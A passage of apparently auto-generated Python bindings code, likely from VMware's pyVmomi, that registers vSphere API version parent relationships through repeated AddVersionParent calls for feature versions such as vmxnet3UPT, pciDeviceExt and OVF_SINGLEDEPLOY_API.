AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version4")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version5")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version2")
AddVersionParent("vim.version.pciSriovExtendedID", "vim.version.version3")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.query.version.version4")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.query.version.version3")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.query.version.version2")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.query.version.version1")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.version.version0")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.version.version1")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.version.version2")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v6_9_1")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v6_8_7")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.vmxnet3UPT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version13")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version14")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version15")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.vmxnet3UPT")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version10")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version11")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version12")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.v7_0")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version8")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version9")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version6")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version7")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version1")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version4")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version5")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version2")
AddVersionParent("vim.version.vmxnet3UPT", "vim.version.version3")
AddVersionParent("vim.version.version10", "vmodl.query.version.version4")
AddVersionParent("vim.version.version10", "vmodl.query.version.version3")
AddVersionParent("vim.version.version10", "vmodl.query.version.version2")
AddVersionParent("vim.version.version10", "vmodl.query.version.version1")
AddVersionParent("vim.version.version10", "vmodl.version.version0")
AddVersionParent("vim.version.version10", "vmodl.version.version1")
AddVersionParent("vim.version.version10", "vmodl.version.version2")
AddVersionParent("vim.version.version10", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version10", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.version10", "vim.version.version10")
AddVersionParent("vim.version.version10", "vim.version.version8")
AddVersionParent("vim.version.version10", "vim.version.version9")
AddVersionParent("vim.version.version10", "vim.version.version6")
AddVersionParent("vim.version.version10", "vim.version.version7")
AddVersionParent("vim.version.version10", "vim.version.version1")
AddVersionParent("vim.version.version10", "vim.version.version4")
AddVersionParent("vim.version.version10", "vim.version.version5")
AddVersionParent("vim.version.version10", "vim.version.version2")
AddVersionParent("vim.version.version10", "vim.version.version3")
AddVersionParent("vim.version.version11", "vmodl.query.version.version4")
AddVersionParent("vim.version.version11", "vmodl.query.version.version3")
AddVersionParent("vim.version.version11", "vmodl.query.version.version2")
AddVersionParent("vim.version.version11", "vmodl.query.version.version1")
AddVersionParent("vim.version.version11", "vmodl.version.version0")
AddVersionParent("vim.version.version11", "vmodl.version.version1")
AddVersionParent("vim.version.version11", "vmodl.version.version2")
AddVersionParent("vim.version.version11", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version11", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.version11", "vim.version.version10")
AddVersionParent("vim.version.version11", "vim.version.version11")
AddVersionParent("vim.version.version11", "vim.version.version8")
AddVersionParent("vim.version.version11", "vim.version.version9")
AddVersionParent("vim.version.version11", "vim.version.version6")
AddVersionParent("vim.version.version11", "vim.version.version7")
AddVersionParent("vim.version.version11", "vim.version.version1")
AddVersionParent("vim.version.version11", "vim.version.version4")
AddVersionParent("vim.version.version11", "vim.version.version5")
AddVersionParent("vim.version.version11", "vim.version.version2")
AddVersionParent("vim.version.version11", "vim.version.version3")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.query.version.version4")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.query.version.version3")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.query.version.version2")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.query.version.version1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.version.version0")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.version.version1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.version.version2")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v6_9_1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v6_8_7")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version13")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version14")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version15")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version10")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version11")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version12")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.v7_0")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version8")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version9")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version6")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version7")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version1")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version4")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version5")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version2")
AddVersionParent("vim.version.VMcrypt_IntegrityProtection", "vim.version.version3")
AddVersionParent("vim.version.version12", "vmodl.query.version.version4")
AddVersionParent("vim.version.version12", "vmodl.query.version.version3")
AddVersionParent("vim.version.version12", "vmodl.query.version.version2")
AddVersionParent("vim.version.version12", "vmodl.query.version.version1")
AddVersionParent("vim.version.version12", "vmodl.version.version0")
AddVersionParent("vim.version.version12", "vmodl.version.version1")
AddVersionParent("vim.version.version12", "vmodl.version.version2")
AddVersionParent("vim.version.version12", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version12", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.version12", "vim.version.version10")
AddVersionParent("vim.version.version12", "vim.version.version11")
AddVersionParent("vim.version.version12", "vim.version.version12")
AddVersionParent("vim.version.version12", "vim.version.version8")
AddVersionParent("vim.version.version12", "vim.version.version9")
AddVersionParent("vim.version.version12", "vim.version.version6")
AddVersionParent("vim.version.version12", "vim.version.version7")
AddVersionParent("vim.version.version12", "vim.version.version1")
AddVersionParent("vim.version.version12", "vim.version.version4")
AddVersionParent("vim.version.version12", "vim.version.version5")
AddVersionParent("vim.version.version12", "vim.version.version2")
AddVersionParent("vim.version.version12", "vim.version.version3")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.query.version.version4")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.query.version.version3")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.query.version.version2")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.query.version.version1")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.version.version0")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.version.version1")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.version.version2")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v6_9_1")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v6_8_7")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.pciDeviceExt", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version13")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version14")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version15")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version10")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version11")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version12")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.pciDeviceExt")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.v7_0")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version8")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version9")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version6")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version7")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version1")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version4")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version5")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version2")
AddVersionParent("vim.version.pciDeviceExt", "vim.version.version3")
AddVersionParent("vim.version.toolsOffHost", "vmodl.query.version.version4")
AddVersionParent("vim.version.toolsOffHost", "vmodl.query.version.version3")
AddVersionParent("vim.version.toolsOffHost", "vmodl.query.version.version2")
AddVersionParent("vim.version.toolsOffHost", "vmodl.query.version.version1")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.toolsOffHost", "vmodl.version.version0")
AddVersionParent("vim.version.toolsOffHost", "vmodl.version.version1")
AddVersionParent("vim.version.toolsOffHost", "vmodl.version.version2")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v6_9_1")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v6_8_7")
AddVersionParent("vim.version.toolsOffHost", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.toolsOffHost", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version13")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version14")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version15")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version10")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version11")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version12")
AddVersionParent("vim.version.toolsOffHost", "vim.version.toolsOffHost")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.toolsOffHost", "vim.version.v7_0")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version8")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version9")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version6")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version7")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version1")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version4")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version5")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version2")
AddVersionParent("vim.version.toolsOffHost", "vim.version.version3")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.query.version.version4")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.query.version.version3")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.query.version.version2")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.query.version.version1")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.version.version0")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.version.version1")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.version.version2")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v6_9_1")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v6_8_7")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hostCertificateManagement", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version13")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version14")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version15")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version10")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version11")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version12")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.hostCertificateManagement")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.v7_0")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version8")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version9")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version6")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version7")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version1")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version4")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version5")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version2")
AddVersionParent("vim.version.hostCertificateManagement", "vim.version.version3")
AddVersionParent("vim.version.vmMisc", "vmodl.query.version.version4")
AddVersionParent("vim.version.vmMisc", "vmodl.query.version.version3")
AddVersionParent("vim.version.vmMisc", "vmodl.query.version.version2")
AddVersionParent("vim.version.vmMisc", "vmodl.query.version.version1")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.vmMisc", "vmodl.version.version0")
AddVersionParent("vim.version.vmMisc", "vmodl.version.version1")
AddVersionParent("vim.version.vmMisc", "vmodl.version.version2")
AddVersionParent("vim.version.vmMisc", "vim.version.v6_9_1")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.vmMisc", "vim.version.v6_8_7")
AddVersionParent("vim.version.vmMisc", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.vmMisc", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.vmMisc", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.vmMisc", "vim.version.version13")
AddVersionParent("vim.version.vmMisc", "vim.version.version14")
AddVersionParent("vim.version.vmMisc", "vim.version.version15")
AddVersionParent("vim.version.vmMisc", "vim.version.version10")
AddVersionParent("vim.version.vmMisc", "vim.version.version11")
AddVersionParent("vim.version.vmMisc", "vim.version.version12")
AddVersionParent("vim.version.vmMisc", "vim.version.vmMisc")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.vmMisc", "vim.version.v7_0")
AddVersionParent("vim.version.vmMisc", "vim.version.version8")
AddVersionParent("vim.version.vmMisc", "vim.version.version9")
AddVersionParent("vim.version.vmMisc", "vim.version.version6")
AddVersionParent("vim.version.vmMisc", "vim.version.version7")
AddVersionParent("vim.version.vmMisc", "vim.version.version1")
AddVersionParent("vim.version.vmMisc", "vim.version.version4")
AddVersionParent("vim.version.vmMisc", "vim.version.version5")
AddVersionParent("vim.version.vmMisc", "vim.version.version2")
AddVersionParent("vim.version.vmMisc", "vim.version.version3")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.query.version.version4")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.query.version.version3")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.query.version.version2")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.query.version.version1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.version.version0")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.version.version1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.version.version2")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v6_9_1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v6_8_7")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version13")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version14")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version15")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version10")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version11")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version12")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.VLCM_QuickLaunchPreload")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.v7_0")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version8")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version9")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version6")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version7")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version1")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version4")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version5")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version2")
AddVersionParent("vim.version.VLCM_QuickLaunchPreload", "vim.version.version3")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.query.version.version4")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.query.version.version3")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.query.version.version2")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.query.version.version1")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.version.version0")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.version.version1")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.version.version2")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v6_9_1")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v6_8_7")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.LSI2PVSCSI", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version13")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version14")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version15")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version10")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version11")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version12")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.LSI2PVSCSI")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.v7_0")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version8")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version9")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version6")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version7")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version1")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version4")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version5")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version2")
AddVersionParent("vim.version.LSI2PVSCSI", "vim.version.version3")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.query.version.version4")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.query.version.version3")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.query.version.version2")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.query.version.version1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.version.version0")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.version.version1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.version.version2")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v6_9_1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v6_8_7")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version13")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version14")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version15")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version10")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version11")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version12")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.ProvisioningEventRefresh")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.v7_0")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version8")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version9")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version6")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version7")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version1")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version4")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version5")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version2")
AddVersionParent("vim.version.ProvisioningEventRefresh", "vim.version.version3")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.query.version.version4")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.query.version.version3")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.query.version.version2")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.query.version.version1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.version.version0")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.version.version1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.version.version2")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v6_9_1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v6_8_7")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version13")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version14")
AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", "vim.version.version15")
